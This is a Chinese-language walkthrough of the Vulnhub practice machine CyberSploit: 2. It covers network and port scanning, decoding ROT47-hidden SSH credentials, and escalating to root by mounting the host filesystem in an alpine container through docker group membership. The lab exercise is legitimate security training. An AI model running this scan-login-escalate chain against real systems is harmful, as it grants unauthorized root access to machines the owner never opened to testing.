靶机渗透测试(CyberSploit: 2)

靶机渗透测试(CyberSploit: 2):

Vulnhub靶机 CyberSploit: 2
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机难度:(Easy–Intermediate
目标:Boot to Root .Your target is gain the Root access



渗透流程:

1. 探测靶机ip地址(netdiscover -i eth0 -r 网关)

命令:netdiscover -i eth0 -r 192.168.10.0

嗅探出靶机ip为 192.168.10.79

靶机渗透测试(CyberSploit: 2)



2. nmap进行靶机端口服务扫描

命令: nmap -sS -Pn -A -p- -n 192.168.10.79 (靶机ip)

可以看到靶机开放了22-ssh,80-http端口服务;

靶机渗透测试(CyberSploit: 2)



3. 根据端口服务进行渗透(80/tcp–http端口服务)

3.1. 访问web页面.

访问192.168.10.79:80页面,首先从web页面进行信息收集;
可以看到页面中存在了一些用户名与密码,网页中的其他url跳转地址均设置为#,不允许跳转!!!

靶机渗透测试(CyberSploit: 2)

靶机渗透测试(CyberSploit: 2)

3.2. 查看源代码.

查看源代码,在末尾处看到ROT47的指示命令>>baidu一波!!!

靶机渗透测试(CyberSploit: 2)

靶机渗透测试(CyberSploit: 2)
3.3. 使用rot47在线网站解密(移位密码)

经过百度可知为移位密码,所以回到80web页面,查看可疑d的用户名密码,进行编码转换;
ROT在线解密

得到ssh’登陆的用户名/ 密码:

shailendra/cybersploit1

靶机渗透测试(CyberSploit: 2)

靶机渗透测试(CyberSploit: 2)



4. ssh连接靶机(22/ssh端口服务)

4.1.ssh登陆

命令: ssh [email protected]
回车
输入密码 cybersploit1

靶机渗透测试(CyberSploit: 2)
4.2.docker容器

进入home家目录,发现存在hint.txt文件,cat查看文件内容,内容为docker;

靶机渗透测试(CyberSploit: 2)

使用id命令查看用户组,果然结果是docker组,再使用docker images命令发现本地没有镜像;

命令: docker inages

解题思路:联网拉取镜像;



5. 提权:

我们需要联网拉取镜像;

命令: docker pull alpine
alpine是迷你的linux系统
命令: docker images
用于查看本地已下载的镜像
命令: docker run -v /:/mnt -it alpine
执行镜像文件

靶机渗透测试(CyberSploit: 2)
靶机渗透测试(CyberSploit: 2)

提权成功,寻找flag的存放地址:

命令: find -name flag.txt

靶机渗透测试(CyberSploit: 2)
靶机渗透测试(CyberSploit: 2)


在docker中使用alpine

  1. 拉取启动
    docker pull alpine
    docker run -it --name 【containername】 【imagename】
    -i 以交互模式运行容器,通常与 -t 同时使用;
    -t 为容器重新分配一个伪输入终端,通常与 -i 同时使用;
    -d 后台运行容器,并返回容器ID;
  2. 文件传输
    从主机复制到容器sudo docker cp host_path containerID:container_path
    从容器复制到主机sudo docker cp containerID:container_path host_path


实验总结:

本次实验过程中,使人耳目一新的是前期的信息收集模块,ROT移位密码的加密解密,然后登陆ssh,得到低权限用户;

在提权过程中,本次靶机使用docker镜像拉取,docker的一系列命令是本次的新颖;

参考博客:
http://c.biancheng.net/view/3143.html